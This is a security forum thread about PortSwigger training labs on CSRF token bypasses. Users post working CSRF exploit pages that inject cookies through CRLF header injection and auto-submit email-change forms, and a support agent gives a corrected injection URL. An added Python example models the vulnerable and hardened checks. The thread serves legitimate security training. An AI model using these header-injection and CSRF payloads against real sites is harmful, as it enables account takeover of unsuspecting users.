Burp Suite User Forum


Lab #5: CSRF where token is tied to non-session cookie & Lab #6: CSRF where token is duplicated in cookie issues

LeeSu | Last updated: Oct 11, 2022 05:28PM UTC

Hello, I have been working on the CSRF Labs and I'm having problems with the following labs:

- Lab #5: CSRF where token is tied to non-session cookie
- Lab #6: CSRF where token is duplicated in cookie

For Lab #5, below is what I have tried.

1. Obtained the attacker's (carlos) CSRF key from the cookie header.
2. Obtained the attacker's (carlos) CSRF token from the input parameter.
3. Crafted an HTML page that does the following:
   - Inject the attacker's CSRF key into the victim's (wiener) browser cookie using the HTTP header injection method.
   - Submit the email change request with the attacker's CSRF token as the "csrf" parameter value.

And below is the HTML code I made:

    <html>
    <body>
    <iframe style="display:none;" name="csrf-iframe"></iframe>
    <form method="POST" action="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
    <input type="hidden" name="email" value="pwned2@evil-user.net" />
    <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" />
    <input type="submit" name="Submit request" />
    </form>
    <img src="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrfKey=zgDp4fdQA9P0XHabWg8qL4KcNuJvQoIR" onerror="document.getElementById('csrf-form').submit()">
    </body>
    </html>

I have also tried this:

    <html>
    <body>
    <iframe style="display:none;" name="csrf-iframe"></iframe>
    <form method="POST" action="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
    <input type="hidden" name="email" value="pwned2@evil-user.net" />
    <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" />
    <input type="submit" name="Submit request" />
    </form>
    <img src="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrfKey=zgDp4fdQA9P0XHabWg8qL4KcNuJvQoIR" onerror="document.forms[0].submit()">
    </body>
    </html>

Upon delivering both exploits using the exploit server, I don't get any success message for the lab and it remains unsolved. The victim's email does get changed when I submit the request with the attacker's CSRF key and token using Burp Repeater. I have followed the YouTube instructions but it still didn't get solved. When I view the exploit it says "Invalid CSRF Token". I don't understand how that can be, as I have checked that I am using a fresh CSRF token and key from the attacker (carlos).

For Lab #6, below is what I have tried.

    <html>
    <body>
    <iframe style="display:none;" name="csrf-iframe"></iframe>
    <form method="POST" action="https://0a3100b904c9da75c0386aad006b00b0.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
    <input type="hidden" name="email" value="pwned1@evil-user.net" />
    <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" />
    </form>
    <img src="https://0a3100b904c9da75c0386aad006b00b0.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrf=v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" onerror="document.getElementById('csrf-form').submit()">
    </body>
    </html>

This also doesn't work using the exploit server, but it works when using Burp Repeater. I have also checked that the csrf token gets successfully injected into the cookie header with this input "TEST%0D%0ASet-Cookie:%20csrf=v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" on the search function using Burp Repeater. Can you spot what the issue is with my exploits? Thank you!
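The two token-validation schemes these labs exercise, modelled in Python as an added educational example (this is neither PortSwigger's lab code nor the poster's exploit): a token derived from a non-session csrfKey cookie (Lab #5) and a token duplicated in a csrf cookie (Lab #6), side by side with a session-bound check that does not care about planted cookies, plus the CR/LF rejection that closes the header-injection path the search parameter abuses. The secret, session id, cookie names other than those in the thread, and email address are all constructed for the example.

```python
import hashlib
import hmac

# Constructed server secret for the example; a real deployment keeps this
# out of source control and rotates it.
SERVER_SECRET = b"constructed-example-secret"


def derive_token(binding_value: str) -> str:
    """CSRF token = HMAC-SHA256(server secret, binding value).

    The lab-style scheme binds the token to a csrfKey cookie; the hardened
    scheme binds it to the session id. Same primitive, different input.
    """
    return hmac.new(SERVER_SECRET, binding_value.encode(), hashlib.sha256).hexdigest()


def verify_key_bound(cookies: dict, form: dict) -> bool:
    """Lab #5 pattern: form token must match HMAC(secret, csrfKey cookie).

    Whoever can plant the csrfKey cookie in the victim's browser also decides
    which token the server will accept, so a key/token pair taken from the
    attacker's own account validates inside the victim's session.
    """
    key = cookies.get("csrfKey")
    if key is None:
        return False
    return hmac.compare_digest(form.get("csrf", ""), derive_token(key))


def verify_double_submit(cookies: dict, form: dict) -> bool:
    """Lab #6 pattern (double-submit cookie): form token must equal csrf cookie.

    This holds up only while the attacker cannot set cookies on the target
    origin; a reflected CR/LF in a response header breaks that assumption.
    """
    cookie = cookies.get("csrf")
    if cookie is None:
        return False
    return hmac.compare_digest(form.get("csrf", ""), cookie)


def verify_session_bound(cookies: dict, form: dict, sessions: dict) -> bool:
    """Hardened check: token must match HMAC(secret, server-side session id).

    Extra cookies an attacker plants are ignored, and the attacker cannot
    derive the victim's token without the victim's session id.
    """
    sid = cookies.get("session")
    if sid not in sessions:
        return False
    return hmac.compare_digest(form.get("csrf", ""), derive_token(sid))


def set_cookie_header(name: str, value: str) -> str:
    """Build a Set-Cookie header line, refusing CR/LF in either part.

    Reflecting user input into a header without this check is what lets a
    '%0d%0aSet-Cookie:' sequence in the search parameter start a second header.
    """
    for part in (name, value):
        if "\r" in part or "\n" in part:
            raise ValueError("CR/LF not permitted in cookie name or value")
    return f"Set-Cookie: {name}={value}; Secure"


def planted_cookie_scenario() -> dict:
    """Replay the thread's situation against all three verifiers.

    The attacker's own csrfKey/token pair (constructed values) is submitted on
    a request carrying the victim's session cookie plus the cookies the
    attacker planted. Returns each verifier's verdict.
    """
    sessions = {"victim-session-id": "wiener"}      # constructed session store
    attacker_key = "attacker-csrfKey-value"         # constructed
    attacker_token = derive_token(attacker_key)     # attacker's own token

    cookies = {
        "session": "victim-session-id",   # victim's genuine session cookie
        "csrfKey": attacker_key,          # planted via header injection
        "csrf": attacker_token,           # planted via header injection
    }
    form = {"email": "pwned@example.invalid", "csrf": attacker_token}

    return {
        "key_bound_accepts": verify_key_bound(cookies, form),
        "double_submit_accepts": verify_double_submit(cookies, form),
        "session_bound_accepts": verify_session_bound(cookies, form, sessions),
    }


if __name__ == "__main__":
    print(planted_cookie_scenario())
    try:
        set_cookie_header("csrfKey", "x\r\nSet-Cookie: planted=1")
    except ValueError as err:
        print("rejected:", err)
```

Running the scenario shows the first two verifiers accepting the forged request and the session-bound one rejecting it; the fix for both labs on the server side is the same: bind the token to the session, not to a cookie the client can be made to carry, and never let raw input reach a response header.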

Michelle, PortSwigger Agent | Last updated: Oct 12, 2022 09:18AM UTC

Thanks for your message. There has been a recent change to the exploit server, so the $cookie-injection-url needs to include SameSite=None for these two labs, for example:

    https://<your-lab-id>/?search=test%0d%0aSet-Cookie:%20csrf=fake;%20SameSite=None

We'll be updating the solutions soon.

LeeSu | Last updated: Oct 17, 2022 05:54PM UTC

Thank you for the reply, I was able to solve the labs following your instruction. Much appreciated.

BirD | Last updated: Mar 18, 2024 09:18AM UTC

I followed the steps in the video closely, but the email address was still not modified successfully ("Invalid CSRF token"). But submitting the same POC got "Congratulations, you solved the lab!".

For Lab #6, below is what I have tried.

    <html>
    <body>
    <form method="POST" action="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
    <input type="hidden" name="email" value="pwned2@evil-user.net" />
    <input type="hidden" name="csrf" value="pIoHy5hQ3urDP85gNtiopg0nFd52a3uf" />
    <input type="submit" name="Submit request" />
    </form>
    <img src="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/?search=hat%0d%0aSet-Cookie%3a%20csrfKey=A9PU4tHQsloOMnhGwNd6Kw3Eg62DsNEH%3b%20SameSite=None" onerror="document.forms[0].submit()">
    </body>
    </html>

Michelle, PortSwigger Agent | Last updated: Mar 18, 2024 01:29PM UTC

Hi, when testing this on yourself, did you have the csrf token in the form set to your CSRF token and the csrfKey in the img src link set to fake? When you then deliver this to the victim, did you set both values to fake?
